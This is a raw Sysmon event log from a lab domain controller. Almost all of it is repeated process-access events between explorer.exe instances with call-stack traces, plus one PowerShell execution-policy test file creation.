22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 11241100x80000000000000001695001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4ugnkebm.udi.ps12021-03-01 22:52:57.207 10341000x80000000000000001695000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 